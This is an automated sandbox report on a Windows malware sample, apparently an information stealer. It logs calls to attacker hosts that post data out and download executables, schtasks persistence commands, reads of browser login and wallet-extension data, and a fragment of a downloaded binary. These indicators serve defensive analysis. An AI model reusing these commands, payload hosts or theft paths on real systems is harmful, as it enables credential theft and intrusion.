Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Dec. 19, 2022, 9:43 a.m.	Dec. 19, 2022, 9:48 a.m.

Size	2.3MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`5debae710acc279440b0fb96ad7ba5ef`
SHA256	`b60004cf3b319182c85d8feeae4d3fc9d9f7cec8dd7740b1f7731f1d21cb11a8`
CRC32	`5EF94A2F`
ssdeep	`49152:ojOcnDWdf0c37oGtkJ/5Hb4bd/nG78GDeYDCThetBdDdMJoTdtqhpP:mOcDaf0mkddod/nbGEadM`
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

WW20.exe "C:\Users\test22\AppData\Local\Temp\WW20.exe"
2540
- chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  2748
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef441f1e8,0x7fef441f1f8,0x7fef441f208
    2792
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2752 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
    2860
- g8NyBEXVWyvZ5Q97arupA5LD.exe "C:\Users\test22\Pictures\Minor Policy\g8NyBEXVWyvZ5Q97arupA5LD.exe"
  2992
  - schtasks.exe schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK HR" /sc HOURLY /rl HIGHEST
    3036
  - schtasks.exe schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK LG" /sc ONLOGON /rl HIGHEST
    812

Name	Response	Post-Analysis Lookup
metazone1.com	A 31.31.196.244	31.31.196.244
iplis.ru	A 148.251.234.93	148.251.234.93
vk.com	A 87.240.129.133 A 87.240.132.72 A 87.240.132.78 A 87.240.137.164 A 93.186.225.194 A 87.240.132.67	87.240.132.67
iplogger.org	A 148.251.234.83	148.251.234.83
ipinfo.io	A 34.117.59.81	34.117.59.81

IP Address	Status	Action
107.182.129.251	Active	Moloch
148.251.234.83	Active	Moloch
148.251.234.93	Active	Moloch
163.123.143.4	Active	Moloch
164.124.101.2	Active	Moloch
31.31.196.244	Active	Moloch
34.117.59.81	Active	Moloch
45.10.52.33	Active	Moloch
87.240.129.133	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49170 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49170 -> 87.240.129.133:80	2038650	ET INFO Observed URL Shortening Service Domain (vk .com in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49163 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49163 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49170 -> 87.240.129.133:80	2038650	ET INFO Observed URL Shortening Service Domain (vk .com in TLS SNI)	Potentially Bad Traffic
TCP 34.117.59.81:443 -> 192.168.56.101:49163	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49176 -> 163.123.143.4:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 107.182.129.251:80 -> 192.168.56.101:49164	2400008	ET DROP Spamhaus DROP Listed Traffic Inbound group 9	Misc Attack
TCP 192.168.56.101:49176 -> 163.123.143.4:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
UDP 192.168.56.101:53004 -> 164.124.101.2:53	2038648	ET INFO URL Shortening Service Domain in DNS Lookup (vk .com)	Potentially Bad Traffic
TCP 148.251.234.93:443 -> 192.168.56.101:49182	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
UDP 192.168.56.101:53850 -> 164.124.101.2:53	2035948	ET POLICY IP Check Domain (iplogger .org in DNS Lookup)	Potential Corporate Privacy Violation
TCP 163.123.143.4:80 -> 192.168.56.101:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 163.123.143.4:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49175 -> 87.240.129.133:443	2038650	ET INFO Observed URL Shortening Service Domain (vk .com in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 87.240.129.133:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 148.251.234.83:443 -> 192.168.56.101:49184	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49181 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 87.240.129.133:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 87.240.129.133:80	2038650	ET INFO Observed URL Shortening Service Domain (vk .com in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49167 -> 87.240.129.133:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 87.240.129.133:80	2038650	ET INFO Observed URL Shortening Service Domain (vk .com in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49183 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49183 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49167 -> 87.240.129.133:80	2038650	ET INFO Observed URL Shortening Service Domain (vk .com in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 87.240.129.133:80	2038650	ET INFO Observed URL Shortening Service Domain (vk .com in TLS SNI)	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49163 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	4e:22:32:5f:c2:00:65:ac:06:fb:71:62:4b:77:57:f0:0e:54:b8:cf
TLSv1 192.168.56.101:49175 87.240.129.133:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	50:24:2a:d1:17:55:8b:34:61:58:4d:21:51:d3:9a:ae:ce:a7:06:97

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameA Dec. 19, 2022, 9:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 19, 2022, 9:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 19, 2022, 9:43 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (37 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 19, 2022, 9:36 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 19, 2022, 9:43 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 19, 2022, 9:43 a.m.	buffer: Invalid argument/option - 'Files'. Type "SCHTASKS /CREATE /?" for usage. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 19, 2022, 9:43 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 19, 2022, 9:43 a.m.	buffer: Invalid argument/option - 'Files'. Type "SCHTASKS /CREATE /?" for usage. console_handle: 0x0000000b	1	1

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\Locales\ko.pak

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Dec. 19, 2022, 9:36 a.m.	stacktrace: 0x4a2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a2e04 registers.r14: 188018224 registers.r15: 188018664 registers.rcx: 1420 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 110798192 registers.rsp: 188017400 registers.r11: 188021920 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1472 registers.r12: 32814352 registers.rbp: 188017536 registers.rdi: 32814096 registers.rax: 4861440 registers.r13: 188018096	1	0	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	POST method with no referer header	suspicious_request	POST http://metazone1.com/api/firegate.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://107.182.129.251/download/it_tab.jpeg
suspicious_features	Connection to IP address	suspicious_request	GET http://107.182.129.251/download/it_tab.jpeg
suspicious_features	Connection to IP address	suspicious_request	GET http://107.182.129.251/download/it_tab.png
suspicious_features	Connection to IP address	suspicious_request	HEAD http://163.123.143.4/download/YT_Client.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://163.123.143.4/download/YT_Client.exe

Performs some HTTP requests (9 events)

request	GET http://metazone1.com/api/tracemap.php
request	POST http://metazone1.com/api/firegate.php
request	HEAD http://107.182.129.251/download/it_tab.jpeg
request	GET http://107.182.129.251/download/it_tab.jpeg
request	GET http://107.182.129.251/download/it_tab.png
request	HEAD http://163.123.143.4/download/YT_Client.exe
request	GET http://163.123.143.4/download/YT_Client.exe
request	GET https://ipinfo.io/widget
request	GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1

Sends data using the HTTP POST Method (1 event)

request

POST http://metazone1.com/api/firegate.php

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

iplis.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 19, 2022, 9:36 a.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 19, 2022, 9:36 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Dec. 19, 2022, 9:36 a.m.	process_identifier: 2860 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 2748 crashed
__exception__ Dec. 19, 2022, 9:36 a.m.	stacktrace: 0x4a2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a2e04 registers.r14: 188018224 registers.r15: 188018664 registers.rcx: 1420 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 110798192 registers.rsp: 188017400 registers.r11: 188021920 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1472 registers.r12: 32814352 registers.rbp: 188017536 registers.rdi: 32814096 registers.rax: 4861440 registers.r13: 188018096	1	0	0

Steals private information from local Internet browsers (50 out of 75 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\js\jquery362.js
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\icons\git.pdn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\icons\logoJG.png
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-63A01ACF-ABC.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\2748-1671410600218750.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\css
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\css\index.css
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\icons
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\_metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-63327DF3-A54.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\index.html
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\icons\icon128.png
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\bc75ff5f-a049-4596-b624-23db42c50fe1.dmp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\js
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0

Foreign language identified in PE resource (1 event)

name

RT_VERSION

language

LANG_NEUTRAL

filetype

data

sublanguage

SUBLANG_ARABIC_OMAN

offset

0x00249970

size

0x000002ac

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (5 events)

file	C:\Users\test22\Pictures\Minor Policy\g8NyBEXVWyvZ5Q97arupA5LD.exe
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\js\background.js
file	C:\Users\test22\Pictures\Minor Policy\DQBAKWkBRb3J7NnOFLAz4GEi.exe
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\js\newTab_script.js
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhpphpanfghgfhmmdmcfndlfiecpmcmk\1.0.3_0\js\jquery362.js

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW Dec. 19, 2022, 9:43 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1	0

Creates a suspicious process (2 events)

cmdline	schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK HR" /sc HOURLY /rl HIGHEST

Drops a binary and executes it (1 event)

file	C:\Users\test22\Pictures\Minor Policy\g8NyBEXVWyvZ5Q97arupA5LD.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Dec. 19, 2022, 9:43 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\g8NyBEXVWyvZ5Q97arupA5LD.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\g8NyBEXVWyvZ5Q97arupA5LD.exe	1	1
CreateProcessInternalW Dec. 19, 2022, 9:43 a.m.	thread_identifier: 3040 thread_handle: 0x000000d4 process_identifier: 3036 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000d8	1	1
CreateProcessInternalW Dec. 19, 2022, 9:43 a.m.	thread_identifier: 2056 thread_handle: 0x000000e0 process_identifier: 812 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000dc	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (5 events)

Time & API	Arguments	Status	Return
Process32NextW Dec. 19, 2022, 9:43 a.m.	snapshot_handle: 0x000003cc process_name: mobsync.exe process_identifier: 2276	1	1
Process32NextW Dec. 19, 2022, 9:43 a.m.	snapshot_handle: 0x000003cc process_name: pw.exe process_identifier: 2320	1	1
Process32NextW Dec. 19, 2022, 9:43 a.m.	snapshot_handle: 0x000003cc process_name: taskhost.exe process_identifier: 2340	1	1
Process32NextW Dec. 19, 2022, 9:43 a.m.	snapshot_handle: 0x000003cc process_name: WW20.exe process_identifier: 2540	1	1
Process32NextW Dec. 19, 2022, 9:43 a.m.	snapshot_handle: 0x000003cc process_name: 쒌f湗直镈I process_identifier: 62		0

An executable file was downloaded by the process ww20.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Dec. 19, 2022, 9:43 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÑK¯ÎÁÁÁÞRÂÁÞRÄ7ÁÞRÅÁÇ_ÅÁÇ_ÂÁÇ_Ä¾ÁÞRÀÁÀ1ÁT_ÈÁT_>ÁT_ÃÁRichÁPELçycàè¤4ù@Ð@°fx è°\R8R@È.text5æè `.rdata,prì@@.datax^@À.rsrcè j@@.reloc°l@BUìQMüEüÇ$B3ÉUüÂ JEüÀPMÁQèöÄEüå]ÂÌÌÌÌUììMüEüxtMüQUøëÇEøQBEøå]ÃÌÌÌÌÌUìQMüEüÇ$BMüÁQèöÄUâtjEüPè æÄEüå]ÂÌÌUìQMüEüÇ$BMüÁQèßõÄå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMüEüÇ$B3ÉUüÂ JEüÇ@0QBMüÇ0BUüÇBEüå]ÃUììMôè²ÿÿÿhfBEôPè¿ùå]ÃUìQMüEüÇ$B3ÉUüÂ JEüÀPMÁQèØôÄUüÇ0BEüÇBEüå]ÂÌÌUìQMüEüÇ$B3ÉUüÂ JEüÀPMÁQèôÄUüÇ0BEüå]ÂÌÌÌÌÌÌÌÌÌÌÌUììEÁ#U EMôºkÂÿMôUøÇEðE+MøMü}ür}ü#wë è¿3Òu÷3ÀuåMUøå]ÃÌÌÌÌÌÌÌÌÌÌÌUìhHQBèàà]ÃÌUìì@EðEüèáEèUìMèUìMàUäEàMäEÐMÔUÐUüEüPMÈUÌEÈEøMøQUÀRèªÄEôEôPMØUÜEØUÜå]ÃÌÌÌÌÌÌÌÌÌÌÌÌSÜìäðÄUkl$ììð¡B3ÅEü3ÀEÏ3ÉMÎ3ÒUÍEÏEÄMÎMÀUÍU¼¸#ÇE¨=ÛÉE¬M¨U¬pÿÿÿtÿÿÿ¸ßÔ³ÇE :UèÄE¤M U¤xÿÿÿ\|ÿÿÿ¸yãÇEv8{PEMUMU¸JoúÇE hEMUMUpÿÿÿEÈ¹OÕÛWÇEÐq´ú¨MÔºz½ËÇEØN'´UÜ¸yãÇEàJ{PEä¹JoúÇEè hMì3ÒUÌEÌE¸(EÐ)PÿÿÿMÈ request_handle: 0x00cc000c	1	1	0

Expresses interest in specific running processes (1 event)

process

ww20.exe

Potentially malicious URLs were found in the process memory dump (50 out of 1132 events)

url	https://clients4.google.com/invalidation/android/request/
url	http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url	http://services.ukrposhta.com/postindex_new/
url	http://dts.search-results.com/sr?lng=
url	http://inposdom.gob.do/codigo-postal/
url	http://creativecommons.org/ns
url	http://www.postur.fo/
url	https://qc.search.yahoo.com/search?ei=
url	https://cacert.omniroot.com/baltimoreroot.crt09
url	http://crbug.com/122474.
url	https://search.yahoo.com/search?ei=
url	http://t1.symcb.com/ThawtePCA.crl0/
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	https://ct.googleapis.com/aviator/
url	https://datasaver.googleapis.com/v1/clientConfigs
url	http://crl.starfieldtech.com/sfroot-g2.crl0L
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://de.search.yahoo.com/favicon.ico
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	http://msdn.microsoft.com/en-us/library/ms792901.aspx
url	https://www.najdi.si/search.jsp?q=
url	http://x.ss2.us/x.cer0
